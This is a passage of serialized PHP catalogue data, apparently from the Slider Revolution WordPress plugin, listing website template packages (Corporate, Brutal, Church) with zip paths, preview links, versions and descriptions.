Projects\";s:5:\"alias\";s:27:\"Corporate-Selected-Projects\";s:3:\"zip\";s:37:\"packs/Corporate-Selected-Projects.zip\";s:3:\"uid\";s:32:\"1096c78d5f007f3900228a4092515e2e\";s:3:\"img\";s:38:\"Corporate-Selected-Projects/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:2:\"13\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:360;a:25:{s:2:\"id\";s:3:\"385\";s:5:\"title\";s:17:\"Corporate Clients\";s:5:\"alias\";s:17:\"Corporate-Clients\";s:3:\"zip\";s:27:\"packs/Corporate-Clients.zip\";s:3:\"uid\";s:32:\"60fe3a311195bf4dba3e50bd1ab98574\";s:3:\"img\";s:28:\"Corporate-Clients/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:2:\"14\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:361;a:25:{s:2:\"id\";s:3:\"386\";s:5:\"title\";s:20:\"Corporate Text Block\";s:5:\"alias\";s:20:\"Corporate-Text-Block\";s:3:\"zip\";s:30:\"packs/Corporate-Text-Block.zip\";s:3:\"uid\";s:32:\"93b68bb23d65fd1028b6b5f6d19b85b5\";s:3:\"img\";s:31:\"Corporate-Text-Block/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:2:\"15\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:362;a:25:{s:2:\"id\";s:3:\"387\";s:5:\"title\";s:20:\"Corporate Mobile App\";s:5:\"alias\";s:20:\"Corporate-Mobile-App\";s:3:\"zip\";s:30:\"packs/Corporate-Mobile-App.zip\";s:3:\"uid\";s:32:\"e592369d233bea673403daa15c6e498a\";s:3:\"img\";s:31:\"Corporate-Mobile-App/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:2:\"16\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:363;a:25:{s:2:\"id\";s:3:\"388\";s:5:\"title\";s:18:\"Corporate Contacts\";s:5:\"alias\";s:18:\"Corporate-Contacts\";s:3:\"zip\";s:28:\"packs/Corporate-Contacts.zip\";s:3:\"uid\";s:32:\"91ae9488b54b7020f8ae9dfbfd6c563a\";s:3:\"img\";s:29:\"Corporate-Contacts/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:2:\"17\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:364;a:25:{s:2:\"id\";s:3:\"389\";s:5:\"title\";s:16:\"Corporate Footer\";s:5:\"alias\";s:16:\"Corporate-Footer\";s:3:\"zip\";s:26:\"packs/Corporate-Footer.zip\";s:3:\"uid\";s:32:\"a01df90af203f06194c1a18745d79861\";s:3:\"img\";s:27:\"Corporate-Footer/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:2:\"18\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:365;a:25:{s:2:\"id\";s:3:\"390\";s:5:\"title\";s:23:\"Corporate Scroll To Top\";s:5:\"alias\";s:23:\"Corporate-Scroll-To-Top\";s:3:\"zip\";s:33:\"packs/Corporate-Scroll-To-Top.zip\";s:3:\"uid\";s:32:\"2d68f6e4590a9a445e6eb055dfee88ba\";s:3:\"img\";s:34:\"Corporate-Scroll-To-Top/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:2:\"19\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:366;a:25:{s:2:\"id\";s:3:\"402\";s:5:\"title\";s:23:\"Brutal Website Template\";s:5:\"alias\";s:23:\"brutal-website-template\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:31:\"brutal-website-template-package\";s:3:\"img\";s:36:\"packages/brutal-website-template.jpg\";s:7:\"preview\";s:58:\"https://revolution.themepunch.com/brutal-website-template/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:232:\"<span class=\"ttm_content\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";s:174:\"[{\"path\":\"revslider-bubblemorph-addon\\/revslider-bubblemorph-addon.php\",\"name\":\"BubbleMorph AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Brutal Website Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"31\";s:9:\"installed\";b:0;}i:367;a:25:{s:2:\"id\";s:3:\"403\";s:5:\"title\";s:11:\"Brutal Menu\";s:5:\"alias\";s:11:\"brutal-menu\";s:3:\"zip\";s:21:\"packs/brutal-menu.zip\";s:3:\"uid\";s:32:\"04b21c7aee2479793336e964230d6e3f\";s:3:\"img\";s:22:\"brutal-menu/slide1.jpg\";s:7:\"preview\";s:58:\"https://revolution.themepunch.com/brutal-website-template/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:232:\"<span class=\"ttm_content\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Brutal Website Template\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"31\";s:9:\"installed\";b:0;}i:368;a:25:{s:2:\"id\";s:3:\"404\";s:5:\"title\";s:11:\"Brutal Hero\";s:5:\"alias\";s:11:\"brutal-hero\";s:3:\"zip\";s:21:\"packs/brutal-hero.zip\";s:3:\"uid\";s:32:\"a342ad01054b97bac7980fdf9e275b34\";s:3:\"img\";s:22:\"brutal-hero/slide1.jpg\";s:7:\"preview\";s:58:\"https://revolution.themepunch.com/brutal-website-template/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:232:\"<span class=\"ttm_content\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:174:\"[{\"path\":\"revslider-bubblemorph-addon\\/revslider-bubblemorph-addon.php\",\"name\":\"BubbleMorph AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Brutal Website Template\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"31\";s:9:\"installed\";b:0;}i:369;a:25:{s:2:\"id\";s:3:\"405\";s:5:\"title\";s:12:\"Brutal About\";s:5:\"alias\";s:12:\"brutal-about\";s:3:\"zip\";s:22:\"packs/brutal-about.zip\";s:3:\"uid\";s:32:\"a3e1cd2e36c9a783c1932fdafe2e4434\";s:3:\"img\";s:23:\"brutal-about/slide1.jpg\";s:7:\"preview\";s:58:\"https://revolution.themepunch.com/brutal-website-template/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:232:\"<span class=\"ttm_content\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:174:\"[{\"path\":\"revslider-bubblemorph-addon\\/revslider-bubblemorph-addon.php\",\"name\":\"BubbleMorph AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Brutal Website Template\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"31\";s:9:\"installed\";b:0;}i:370;a:25:{s:2:\"id\";s:3:\"406\";s:5:\"title\";s:16:\"Brutal Highlight\";s:5:\"alias\";s:16:\"brutal-highlight\";s:3:\"zip\";s:26:\"packs/brutal-highlight.zip\";s:3:\"uid\";s:32:\"b7f8522dcb4636467633bd3b14f4e3e9\";s:3:\"img\";s:27:\"brutal-highlight/slide1.jpg\";s:7:\"preview\";s:58:\"https://revolution.themepunch.com/brutal-website-template/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:232:\"<span class=\"ttm_content\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Brutal Website Template\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"31\";s:9:\"installed\";b:0;}i:371;a:25:{s:2:\"id\";s:3:\"407\";s:5:\"title\";s:15:\"Brutal Projects\";s:5:\"alias\";s:15:\"brutal-projects\";s:3:\"zip\";s:25:\"packs/brutal-projects.zip\";s:3:\"uid\";s:32:\"1a462e91373042193ca5d623dd8e8a47\";s:3:\"img\";s:26:\"brutal-projects/slide1.jpg\";s:7:\"preview\";s:58:\"https://revolution.themepunch.com/brutal-website-template/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:232:\"<span class=\"ttm_content\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Brutal Website Template\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"31\";s:9:\"installed\";b:0;}i:372;a:25:{s:2:\"id\";s:3:\"408\";s:5:\"title\";s:15:\"Brutal Services\";s:5:\"alias\";s:15:\"brutal-services\";s:3:\"zip\";s:25:\"packs/brutal-services.zip\";s:3:\"uid\";s:32:\"cbeeb1e7a5c2842b155fe13acb7c165d\";s:3:\"img\";s:26:\"brutal-services/slide1.jpg\";s:7:\"preview\";s:58:\"https://revolution.themepunch.com/brutal-website-template/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:232:\"<span class=\"ttm_content\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:174:\"[{\"path\":\"revslider-bubblemorph-addon\\/revslider-bubblemorph-addon.php\",\"name\":\"BubbleMorph AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Brutal Website Template\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"31\";s:9:\"installed\";b:0;}i:373;a:25:{s:2:\"id\";s:3:\"409\";s:5:\"title\";s:14:\"Brutal Callout\";s:5:\"alias\";s:14:\"brutal-callout\";s:3:\"zip\";s:24:\"packs/brutal-callout.zip\";s:3:\"uid\";s:32:\"31b6dafdb2dfb548152653e60df5a3bc\";s:3:\"img\";s:25:\"brutal-callout/slide1.jpg\";s:7:\"preview\";s:58:\"https://revolution.themepunch.com/brutal-website-template/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:232:\"<span class=\"ttm_content\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:174:\"[{\"path\":\"revslider-bubblemorph-addon\\/revslider-bubblemorph-addon.php\",\"name\":\"BubbleMorph AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Brutal Website Template\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"31\";s:9:\"installed\";b:0;}i:374;a:25:{s:2:\"id\";s:3:\"410\";s:5:\"title\";s:13:\"Brutal Footer\";s:5:\"alias\";s:13:\"brutal-footer\";s:3:\"zip\";s:23:\"packs/brutal-footer.zip\";s:3:\"uid\";s:32:\"07559f0c574e3dd95b2d40d72cbb01bc\";s:3:\"img\";s:24:\"brutal-footer/slide1.jpg\";s:7:\"preview\";s:58:\"https://revolution.themepunch.com/brutal-website-template/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:232:\"<span class=\"ttm_content\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Brutal Website Template\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"31\";s:9:\"installed\";b:0;}i:375;a:25:{s:2:\"id\";s:3:\"411\";s:5:\"title\";s:23:\"Church Website Template\";s:5:\"alias\";s:23:\"church-website-template\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:31:\"church-website-template-package\";s:3:\"img\";s:36:\"packages/church-website-template.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/church-website-template-dark/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Church Website Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"32\";s:9:\"installed\";b:0;}i:376;a:25:{s:2:\"id\";s:3:\"412\";s:5:\"title\";s:13:\"Church Header\";s:5:\"alias\";s:13:\"Church-Header\";s:3:\"zip\";s:23:\"packs/Church-Header.zip\";s:3:\"uid\";s:32:\"c14289117e1e2b9ee716fb99146b2e03\";s:3:\"img\";s:24:\"Church-Header/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/church-website-template-dark/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Church Website Template\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"32\";s:9:\"installed\";b:0;}i:377;a:25:{s:2:\"id\";s:3:\"413\";s:5:\"title\";s:22:\"Church Upcoming Events\";s:5:\"alias\";s:22:\"Church-Upcoming-Events\";s:3:\"zip\";s:32:\"packs/Church-Upcoming-Events.zip\";s:3:\"uid\";s:32:\"056a26efddae92973fee4ee5cfa75f10\";s:3:\"img\";s:33:\"Church-Upcoming-Events/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/church-website-template-dark/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Church Website 